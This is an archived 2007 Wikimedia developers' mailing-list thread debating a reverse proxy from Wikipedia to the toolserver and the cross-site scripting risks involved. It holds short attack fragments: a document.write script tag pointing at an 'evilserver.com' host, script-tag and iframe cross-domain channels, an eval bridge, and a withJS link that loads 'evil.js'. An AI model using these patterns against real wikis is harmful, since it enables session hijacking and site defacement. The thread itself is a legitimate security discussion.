Would it be possible to set up reverse proxying from the Wikipedia domains to the toolserver? I.e. have http://en.wikipedia.org/tools/ reverse-proxy the content from the toolserver http://tools.wikimedia.de/ (so that http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
This would avoid the cross-domain scripting prohibitions and allow toolserver developers to incorporate AJAX functionality into their scripts. Yeah, I know, by now most of you will have foam around your mouths from utter annoyance at that overused buzzword. But there is a real use for AJAX (there, I said it again ;-) ).
The [[Meta:WikiMiniAtlas]] uses it to display labels on the map. It currently uses an ugly iframe workaround which splits the JS code in two: one part on meta, the other on the toolserver. With reverse proxying the whole code could reside in the wiki, the iframe could be dropped, and GMaxwell could add Lupin's popups to the atlas (and they would no longer be confined to the tiny iframe). It would make life a bit simpler for toolserver developers...
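For illustration, the kind of mapping I mean could presumably be done with a couple of mod_proxy directives on the Apache side (this is a sketch, not a tested config for the actual Wikimedia setup):

```apache
# Hypothetical sketch: forward /tools/ requests to the toolserver.
ProxyPass        /tools/ http://tools.wikimedia.de/
ProxyPassReverse /tools/ http://tools.wikimedia.de/
```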
Hi!
This would avoid the cross-domain scripting prohibitions, and allow toolserver developers to incorporate AJAX functionality into their scripts.
And it would allow anyone on the toolserver to mount XSS attacks, which creates trust problems. Not to mention the problem of rewrites and request ping-pong across the Atlantic..
Best regards,
On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
Hi!
This would avoid the cross-domain scripting prohibitions, and allow toolserver developers to incorporate AJAX functionality into their scripts.
And it would allow anyone on the toolserver to mount XSS attacks, which creates trust problems.
XSS attacks are already possible by those who can edit the JS files by using the document.write('<script src=" trick.
Not to mention the problem of rewrites and request ping-pong across the Atlantic..
Again, this already happens.
Best regards,
Domas Mituzas -- http://dammit.lt/ -- [[user:midom]]
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org http://lists.wikimedia.org/mailman/listinfo/wikitech-l
Bryan,
XSS attacks are already possible by those who can edit the JS files by using the document.write('<script src=" trick.
That is:
a) Available to sysops of the particular project only.
b) Monitored: it is in watchlists and under revision control.
c) The general codebase is constantly monitored for XSS problems.
Again, this already happens.
How? When?
BR,
a) Available to sysops of particular project only
No, it applies to all user scripts. I doubt that every user who is including them in their profile is doing a security audit of the JavaScript.
b) Monitored, is in watchlists and under revision control.
see a). User scripts are not in revision control (apart from the MediaWiki history).
c) General codebase is constantly monitored for XSS problems.
see a). This already applies to user scripts. The reverse proxy will not open any new security holes. I could already hide code which sends the session keys through embedded iframes to any server in the world in my user JavaScripts, such as the WikiMiniAtlas (which is even included by default).
Hi!
No, it applies to all user scripts. I doubt that every user who is including them in their profile is doing a security audit of the JavaScript.
Only if the user includes them in his profile. Other users can't include anything into a user's profile. A user can use Greasemonkey to load any scripts they want, too; we won't protect against that.
see a). User scripts are not in revision control (apart from the MediaWiki history).
MediaWiki history is revision control ;-) And I'm not talking about user scripts, I'm talking about site-wide scripts.
see a). This already applies to user scripts. The reverse proxy will not open any new security holes. I could already hide code which sends the session keys through embedded iframes to any server in the world in my user JavaScripts, such as the WikiMiniAtlas (which is even included by default).
User JavaScript is the user's problem. Site-wide (all-projects-wide) JavaScript is a serious threat to the site, especially giving uncontrolled, unmonitored access to it.
By not seeing this, you guys confirm that this should not be enabled ;-)
BR,
On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
By not seeing this, you guys confirm that this should not be enabled ;-)
Domas, it seems you're out of touch with the actual current behavior.
Right now anyone that can edit the site-wide scripts can insert a document.write('<script src="http://evilserver.com... and the script loaded as a result of that can then have ongoing communication with the user by itself inserting more script tags, which call a callback function with the result data.
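For concreteness, that channel is essentially hand-rolled JSONP. A sketch of what such an injected script might do (all the names here are invented for illustration):

```javascript
// Hypothetical sketch of the script-tag channel described above.
// buildJsonpUrl and handleData are made-up names for this illustration.
function buildJsonpUrl(base, params, callbackName) {
  var query = [];
  for (var key in params) {
    query.push(encodeURIComponent(key) + '=' + encodeURIComponent(params[key]));
  }
  query.push('callback=' + encodeURIComponent(callbackName));
  return base + '?' + query.join('&');
}

// Browser side (needs a DOM, so not runnable outside a browser): inject
// the tag; the response is a script that calls window[callbackName](data),
// giving the remote server an ongoing request/response channel.
function injectScript(url) {
  var s = document.createElement('script');
  s.src = url;
  document.getElementsByTagName('head')[0].appendChild(s);
}
```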
So you've made a case for limiting control of the proxy functionality to sysops... but not more than that.
No, it applies to all user scripts. I doubt that every user who is including them in their profile is doing a security audit of the JavaScript.
Only if the user includes them in his profile. Other users can't include anything into a user's profile.
Any sysop can. Any sysop can also edit the site-wide JS, or throw a script into the MediaWiki namespace, thus making it available via withJS.
And if your concern is "wikipedia account integrity" you're wrong to dismiss user scripts. Some are very very popular and are used by many accounts with elevated rights, for example: http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/p...
Gregory,
Domas, it seems you're out of touch with the actual current behavior.
ORLY :)
Right now anyone that can edit the site-wide scripts can insert a document.write('<script src="http://evilserver.com... and the script loaded as a result of that can then have ongoing communication with the user by itself inserting more script tags, which call a callback function with the result data.
"anyone that can edit" is:
- limited to a single project
- elected by the community
- has an audit trail
Please be reminded that security consists of three holy As:
- Authentication
- Authorization
- Audit
Though toolserver authentication is a very nice one (SSH keys, etc.!), its authorization has a slightly too wide scope, and there's no change auditing. Sysops are authenticated via HTTP, are authorized to change a single project, and all their actions are logged and monitored.
So you've made a case for limiting control of the proxy functionality to sysops... but not more than that.
You miss something.
Any sysop can. Any sysop can also edit the site-wide JS, or throw a script into the MediaWiki namespace, thus making it available via withJS.
Project-wide only: an ltwiki sysop can't edit enwiki JavaScript, but an ltwiki toolserver user could affect enwiki.
And if your concern is "wikipedia account integrity" you're wrong to dismiss user scripts. Some are very very popular and are used by many accounts with elevated rights, for example: http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/popups.js&limit=5000&from=0
This is where I'm happy to deny any kind of cooperation in case any problems happen.
On 04/09/07, Dschwen lists@schwen.de wrote:
b) Monitored, is in watchlists and under revision control.
see a). User scripts are not in revision control (apart from the MediaWiki history).
...which means it *is* under a form of revision control.
Rob Church
On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
Bryan,
XSS attacks are already possible by those who can edit the JS files by using the document.write('<script src=" trick.
That is: a) Available to sysops of particular project only
It would be easy enough to make the proxy functionality only work for specific URLs defined in a MediaWiki message page. Tada: back to the same level of oversight and control that we already have.
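A sketch of what the check might look like on the proxy side (the function name and the idea of pre-parsed prefixes from the message page are hypothetical):

```javascript
// Hypothetical whitelist check for the proxy: allowedPrefixes would be
// parsed out of a sysop-editable MediaWiki message page.
function isProxyAllowed(path, allowedPrefixes) {
  // Reject path traversal outright.
  if (path.indexOf('..') !== -1) {
    return false;
  }
  // Allow only paths under an approved prefix.
  for (var i = 0; i < allowedPrefixes.length; i++) {
    if (path.indexOf(allowedPrefixes[i]) === 0) {
      return true;
    }
  }
  return false;
}
```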
Oh, and adding to Dschwen's initial point.. the code should remove any session cookie and replace it with a cookie indicating a confirmed username.
Again, this already happens.
How? When?
Any sysop can already insert scripts which call remote scripts which have ongoing communication by inserting script tags over and over again. It's kludgy but it works.
It's also possible to use an invisible iframe as a request proxy off to another domain: http://blog.monstuff.com/archives/000304.html
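A sketch of the fragment-identifier trick the linked article describes (helper names are invented; the point is that changing only the fragment of a frame's URL doesn't trigger a reload, so two frames on different domains can pass messages through it):

```javascript
// Invented helpers illustrating the cross-domain iframe channel: one side
// writes a message into the other frame's URL fragment, the receiving
// frame polls its own location.hash and decodes it.
function encodeFragmentMessage(id, payload) {
  return '#' + id + '=' + encodeURIComponent(payload);
}

function decodeFragmentMessage(hash) {
  var parts = hash.replace(/^#/, '').split('=');
  return { id: parts[0], payload: decodeURIComponent(parts[1] || '') };
}

// Browser side (not runnable here): the receiving frame polls for new
// messages, e.g.
// setInterval(function () {
//   var msg = decodeFragmentMessage(location.hash);
//   if (msg.id !== lastSeenId) { handleMessage(msg.payload); }
// }, 100);
```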
In terms of security profile adding a proxy wouldn't change anything.. but it would allow legitimate tool authors to avoid ugly kludges needed to work around the 'security behavior'.
Hii!
It would be easy enough to make the proxy functionality only work for specific URLs defined in a MediaWiki message page. Tada: back to the same level of oversight and control that we already have.
What kind of change/revision management would those URLs have? Are copies archived/saved on the toolserver for every script that gets uploaded to an accessible area? :)
Oh, and adding to Dschwen's initial point.. the code should remove any session cookie and replace it with a cookie indicating a confirmed username.
It doesn't help with session hijacking - you can still get cookie values with JavaScript, and send an XMLHttpRequest anywhere you want.
Any sysop can already insert scripts which call remote scripts which have ongoing communication by inserting script tags over and over again. It's kludgy but it works.
Yes, it is one of the current security problems; probably the global .js rights have to be moved from sysops to stewards :), but at least we can track who added what and when (revision histories!) - there's no such audit trail on the toolserver.
It's also possible to use an invisible iframe as a request proxy off to another domain: http://blog.monstuff.com/archives/000304.html
You won't be able to read the contents of that frame, nor get cookies, nor modify anything in the frame document's DOM.
In terms of security profile adding a proxy wouldn't change anything..
Now you join the camp of the ignorant! :)
but it would allow legitimate tool authors to avoid ugly kludges needed to work around the 'security behavior'.
the security behavior is to protect wikipedians.
BR
On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
What kind of change/revision management would those URLs have? Are copies archived/saved on toolserver for every script that gets uploaded to accessible area? :)
No more or less than the zillions of pre-existing things invoked remotely via <script src= today.
It doesn't help with session hijacking - you can still get cookie values with JavaScript, and send an XMLHttpRequest anywhere you want.
Indeed, you can.
You can also still do this *today*; no new functionality is needed to create this problem (audit-trail-less thingies stealing session cookies).
Yes, it is one of the current security problems; probably the global .js rights have to be moved from sysops to stewards :), but at least we can track who added what and when (revision histories!) - there's no such audit trail on the toolserver.
Sysops can add, have added, and are adding script-tag calls that call scripts external to the local revision control.
It's also possible to use an invisible iframe as a request proxy off to another domain: http://blog.monstuff.com/archives/000304.html
You won't be able to read the contents of that frame, nor get cookies, nor modify anything in the frame document's DOM.
Sure you can: you make the code running outside of the iframe eval any string the iframe passes to it.
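Something along these lines on the outer page (a sketch; the names are invented):

```javascript
// Sketch of the eval bridge described above: the outer page exposes a
// function, and whatever string the iframe channel delivers is executed
// in the outer page's security context. Names invented for illustration.
function makeEvalBridge(receivedLog) {
  return function (code) {
    receivedLog.push(code); // keep a record of what came over the channel
    return eval(code);      // runs with the outer document's privileges
  };
}
```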
In terms of security profile adding a proxy wouldn't change anything..
Now you join the camp of the ignorant! :)
Hey ... I'm over here.. you're standing in front of a mirror. :)
but it would allow legitimate tool authors to avoid ugly kludges needed to work around the 'security behavior'.
the security behavior is to protect wikipedians.
Security is good. Failing to understand the current behavior and existing practices is not.
And it would allow anyone on the toolserver to mount XSS attacks, which creates trust problems.
Ok, there seems to be some confusion about the security implications and the reasons for the cross-site scripting limitations in the first place.
I can already devise user JS on Wikipedia which could remote-control the user's browser to surf to their home-banking site in an iframe. Now if XSS were allowed I could manipulate the iframe (fill in money amounts and guessed passwords, submit forms, etc.). This is NOT allowed, as the Wikipedia JS cannot access pages from arbitrary different domains. That's a good thing.
Now with the reverse proxy we are not deactivating XSS entirely, we are just allowing remote controlled access to pages on one single server: the toolserver (plus we enable XHR which is very useful).
Granted, an evil user could set up another reverse proxy on the toolserver to then extend the access to other servers, but these proxied pages would appear under different domain names (tools.wikimedia.de), so no automatic password-filling or cookies could be exploited (= no gain!). Plus it would need an opt-in user-JS component on the wiki. AND, a similar thing is already possible without the reverse proxy, by embedding a malicious toolserver iframe (not exploitable either).
I don't see how this would generate any exploitable security holes. But maybe I'm missing part of the picture?!
Hiii!
Didn't spot this email when sending my reply :)
I can already devise user JS on Wikipedia which could remote-control the user's browser to surf to their home-banking site in an iframe.
I don't care about home banking. In this case the problem is Wikipedia account integrity.
Now if XSS were allowed I could manipulate the iframe (fill in money amounts and guessed passwords, submit forms, etc.). This is NOT allowed, as the Wikipedia JS cannot access pages from arbitrary different domains. That's a good thing.
But you can fetch all the user's Wikipedia session details, and do nasty stuff. Like XMLHttpRequests changing passwords, deleting pages and putting huge genitalia images on front pages. :)
Now with the reverse proxy we are not deactivating XSS entirely, we are just allowing remote controlled access to pages on one single server: the toolserver (plus we enable XHR which is very useful).
That remote-controlled access provides the session data of Wikipedia users to any toolserver account.
I don't see how this would generate any exploitable security holes. But maybe I'm missing part of the picture?!
Yup, you are!
But maybe I'm missing part of the picture?!
Yup, you are!
Ah, it is now dawning on me that your concern is pages on the toolserver which the user could be lured to over the reverse-proxy address. Well, you are right, we can construct a potential threat from that. But I wonder whether this has enough impact to really harm Wikipedia. Don't you think this would be discovered fairly quickly? What about limiting the reverse proxying to a number of trustworthy users? For example I'd give Magnus Manske or Gregory Maxwell my login credentials anytime (I'd give them to me as well if I didn't already have them ;-) ).
Domas Mituzas wrote:
Now with the reverse proxy we are not deactivating XSS entirely, we are just allowing remote controlled access to pages on one single server: the toolserver (plus we enable XHR which is very useful).
That remote-controlled access provides the session data of Wikipedia users to any toolserver account.
That could already happen. Currently there are handy scripts on the Wikimedia projects, used even by sysops, that are vulnerable to XSS. The peer review is quite small, because people need to understand JavaScript, take X time to fully understand what that JavaScript is doing, and then check it for vulnerabilities. XSS is subtle. People happily write "SELECT page_content WHERE page_name = '" + getParam('title') + "';"
It's not that hard to add a JS vulnerability. You only need to convince a local sysop that your tool is really nice for doing X. They will blindly copy the line you provide into their monobook.js (the global one if you're lucky).
If you set the toolserver to be non-blocked, the log is exactly the same: he who adds <script src="/tools/... What do you want in order to have it working? Have it pointing to an SVN repository (so anything running there is versioned)?
Having a JS audit would be nice too, but that's another thing (and some users may get a bit angry). If we show you X running vulnerabilities, would you accept it? (And yes, I do think an attacker could put "huge genitalia images on front pages".)
On 9/4/07, Platonides Platonides@gmail.com wrote:
People happily write "SELECT page_content WHERE page_name = '" + getParam('title') + "';"
Mmmm.. PHP: Bringing you SQL injection since 1995.
(And yes, PHP is special in this case; the Perl, Python, etc. DB APIs have a safe way to pass user data without requiring the coder to religiously pass the data through quoting functions.)
[snip]
If you set the toolserver to be non-blocked, the log is exactly the same: he who adds <script src="/tools/... What do you want in order to have it working? Have it pointing to an SVN repository (so anything running there is versioned)?
[snip]
Now that's a dandy idea for pure JS things.. but pure JS things don't need to be off-site.. they can just be tossed into the MediaWiki namespace.
The need to proxy to a backend service comes when you have some local CGI that performs a search or consults a database.
It wouldn't be hard to set up a path whose files could only be changed by pushing things through SVN... especially for software which doesn't require compilation.
This would produce a nice enough audit trail.
Gregory Maxwell wrote:
On 9/4/07, Platonides Platonides@gmail.com wrote:
People happily write "SELECT page_content WHERE page_name = '" + getParam('title') + "';"
Mmmm.. PHP: Bringing you SQL injection since 1995.
(And yes, PHP is special in this case; the Perl, Python, etc. DB APIs have a safe way to pass user data without requiring the coder to religiously pass the data through quoting functions.)
They're doing the same with JavaScript. Luckily MediaWiki doesn't rely on user scripts to escape SQL.
If you set the toolserver to be non-blocked, the log is exactly the same: he who adds <script src="/tools/... What do you want in order to have it working? Have it pointing to an SVN repository (so anything running there is versioned)?
[snip]
Now that's a dandy idea for pure JS things.. but pure JS things don't need to be off-site.. they can just be tossed into the MediaWiki namespace.
The need to proxy to a backend service comes when you have some local CGI that performs a search or consults a database.
It wouldn't be hard to set up a path whose files could only be changed by pushing things through SVN... especially for software which doesn't require compilation.
This would produce a nice enough audit trail.
I wasn't thinking in JavaScripts, but the full files. :-)
I still don't see how this JavaScript proxy adds extra vulnerabilities. The only difference with a proxy is the advantage of being able to directly use an XMLHttpRequest. Introducing this proxy will still only allow local sysops to add toolserver JavaScript to the wiki.
Being a sysop, what I would do then is: var req = sajax_init_request(); req.open('GET', '/tools/~bryan/evil-script');. What I do now is document.write('<script src="http://tools.wikimedia.de/~bryan/evil-script"></script>'). This still executes JavaScript that is out of revision control.
Bryan
On 9/4/07, Bryan Tong Minh bryan.tongminh@gmail.com wrote:
I still don't see how this JavaScript proxy adds extra vulnerabilities.
[snip]
It does if it's a pure proxy with no access control, because I could say "Hey, Bryan, load http://commons.wikimedia.org/w/api.php?tsproxy=~evil/evil.js".. and you follow the link and the evil JS happily steals your session cookie and begins to replace every image with goatse.
For a proxy to present no additional security holes over what we have today, it would have to be limited to only work on sysop-approved URLs.
I've got the impression from Domas that what we have today isn't considered very good... but we can't make a hard security improvement on it unless we disable JS editing by sysops, which would result in a substantial loss of functionality and development resources.
It seems to me that a proxy with an access-control list would actually improve security, since there would be a single point to look at to see what external scripts can be imported... rather than trying to track down all the places in the site JS where it's being accomplished via script-tag injection.
Gregory Maxwell wrote:
For a proxy to present no additional security holes over what we have today, it would have to be limited to only work on sysop-approved URLs.
I've got the impression from Domas that what we have today isn't considered very good... but we can't make a hard security improvement on it unless we disable JS editing by sysops, which would result in a substantial loss of functionality and development resources.
It seems to me that a proxy with an access-control list would actually improve security, since there would be a single point to look at to see what external scripts can be imported... rather than trying to track down all the places in the site JS where it's being accomplished via script-tag injection.
*nod*
What I think I'd like to see us move a little more towards is a model like that where we've got some concept of available JS-based plugins.
That can make management, maintenance, and user-level selection a lot easier than the haphazard 'add this <script=blah> command to your secret JS page' interface we have now; and the easier it is to see what's there the easier it's going to be to keep it secure.
- -- brion vibber (brion @ wikimedia.org)
On 04/09/07, Brion Vibber brion@wikimedia.org wrote:
What I think I'd like to see us move a little more towards is a model like that where we've got some concept of available JS-based plugins.
That can make management, maintenance, and user-level selection a lot easier than the haphazard 'add this <script=blah> command to your secret JS page' interface we have now; and the easier it is to see what's there the easier it's going to be to keep it secure.
I believe Duesentrieb's excellent Gadgets plugin does quite a lot of this...
Rob Church
On 9/4/07, Rob Church robchur@gmail.com wrote:
I believe Duesentrieb's excellent Gadgets plugin does quite a lot of this...
+1
http://www.mediawiki.org/wiki/Extension:Gadgets
Great stuff....
Though it doesn't solve the issue that started this thread, which is how to get tighter integration of some properly external tools, such as the mapping tool Dschwen built. Right now it works okay as an iframe, but that creates some silly limitations.
There is also all sorts of development for tools targeted at established Wikimedians rather than the general public, such as Bryan's hacks on things like http://commons.wikimedia.org/wiki/Commons:FlickrSearch?withJS=MediaWiki:Flic...
Some things like the WikiMiniAtlas don't make a lot of sense as an extension (as an extension it would only be a piece of JS and a daemon totally external to MediaWiki).
Some things might make sense as an extension, but keeping them external is useful for testing, prototyping, and early versions. Not only is there a shallower learning curve for external tools, but there is fault compartmentalization: if you misunderstand how MySQL 4 is going to handle a query, the whole site doesn't go down. And of course the ability to casually hack on something as new feature requests come in... without having to nag someone to push the updates live... is nice.
It does if it's a pure proxy with no access control, because I could say "Hey, Bryan, load http://commons.wikimedia.org/w/api.php?tsproxy=~evil/evil.js".. and you follow the link and the evil JS happily steals your session cookie and begins to replace every image with goatse.
Then I should point out that this very thing is currently possible with this link: http://commons.wikimedia.org/wiki/Eurotunnel?withJS=User:Dschwen/evil.js%26M...
Uhm, actually this wasn't supposed to work, but the security checks on the withJS thingie are a little flaky. I'll fix this in a minute.
Dschwen wrote:
It does if it's a pure proxy with no access control, because I could say "Hey, Bryan, load http://commons.wikimedia.org/w/api.php?tsproxy=~evil/evil.js".. and you follow the link and the evil JS happily steals your session cookie and begins to replace every image with goatse.
Then I should point out that this very thing is currently possible with this link: http://commons.wikimedia.org/wiki/Eurotunnel?withJS=User:Dschwen/evil.js%26M...
Uhm, actually this wasn't supposed to work, but the security checks on the withJS thingie are a little flaky. I'll fix this in a minute.
Seems the review process didn't work so well, Domas. Even worse, when it was published (two months ago) the publication notice included "As it's a potential XSS vector, those able please help reviewing it, to verify the code is safe." :(
Hi!
Seems the review process didn't work so well, Domas. Even worse, when it was published (two months ago) the publication notice included "As it's a potential XSS vector, those able please help reviewing it, to verify the code is safe."
Well, this strengthens the case for restricting JavaScript staging policies even more, if we fail at reviewing :) At least we (heh, you!) had a tool for reviewing.
Dschwen wrote:
Would it be possible to set up reverse proxying from the Wikipedia domains to the toolserver? I.e. have http://en.wikipedia.org/tools/ reverse-proxy the content from the toolserver http://tools.wikimedia.de/ (so that http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
Under NO circumstances will we ever do this, that's a serious security danger.
- -- brion vibber (brion @ wikimedia.org)
http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
Under NO circumstances will we ever do this, that's a serious security danger.
I fail to see how it would be a danger with a carefully selected set of forwards. We already have to trust the contributing admin users. Why would you categorically deny trust to another group of active developers, those on the toolserver? Face it, security is ultimately built on trust in the users implementing it.
Dschwen wrote:
http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
Under NO circumstances will we ever do this, that's a serious security danger.
I fail to see how it would be a danger with a carefully selected set of forwards. We already have to trust the contributing admin users. Why would you categorically deny trust to another group of active developers: on the toolserver?
It greatly increases the vulnerability landscape, whereas I'd prefer to decrease it by tightening controls on site JavaScript.
- -- brion vibber (brion @ wikimedia.org)
Brion Vibber wrote:
Dschwen wrote:
http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
Under NO circumstances will we ever do this, that's a serious security danger.
I fail to see how it would be a danger with a carefully selected set of forwards. We already have to trust the contributing admin users. Why would you categorically deny trust to another group of active developers: on the toolserver?
It greatly increases the vulnerability landscape, whereas I'd prefer to decrease it by tightening controls on site JavaScript.
I'd like to point out in response to a private message from Greg that I'm not averse to any specific tools involving a backend on the toolserver, but just to setting up a general proxying service, which feels fundamentally unsafe to me.
I'm sorry if I sounded overly harsh or dismissive.
-- brion vibber (brion @ wikimedia.org)